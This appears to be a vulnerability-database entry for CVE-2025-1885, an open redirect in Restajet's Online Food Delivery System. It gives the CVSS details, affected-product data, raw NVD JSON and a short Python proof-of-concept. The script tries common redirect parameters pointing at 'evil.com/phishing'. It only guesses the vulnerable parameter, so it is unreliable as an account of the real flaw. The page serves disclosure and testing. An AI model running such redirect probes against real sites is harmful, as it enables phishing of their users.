Security Vulnerability Report
中文
CVE-2025-1885 CVSS 5.4 MEDIUM

CVE-2025-1885

Published: 2025-12-19 12:15:45
Last Modified: 2026-03-26 08:16:19

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Phishing, Forceful Browsing.This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:* - VULNERABLE
Restajet Online Food Delivery System <= 19122025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-1885 Open Redirect PoC # Target: Restajet Online Food Delivery System # Vulnerability: URL Redirection to Untrusted Site TARGET_URL = "http://target-site.com" MALICIOUS_URL = "https://evil.com/phishing" def test_open_redirect(): """ Test for Open Redirect vulnerability in Restajet Online Food Delivery System The vulnerable parameter may be: redirect, url, next, destination, etc. """ vulnerable_params = [ "redirect", "url", "next", "destination", "redir" ] for param in vulnerable_params: # Construct malicious URL with redirect parameter test_url = f"{TARGET_URL}?{param}={MALICIOUS_URL}" try: response = requests.get(test_url, allow_redirects=False) # Check if redirect leads to external site if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if MALICIOUS_URL in location or 'evil.com' in location: print(f"[+] VULNERABLE! Parameter '{param}' allows open redirect") print(f"[+] Redirects to: {location}") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {param}: {e}") print("[-] No open redirect vulnerability found") return False if __name__ == "__main__": test_open_redirect()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-1885", "sourceIdentifier": "[email protected]", "published": "2025-12-19T12:15:45.243", "lastModified": "2026-03-26T08:16:19.267", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Phishing, Forceful Browsing.This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "D9645287-A3CA-4036-B2DB-513F54F58AE6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0469", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}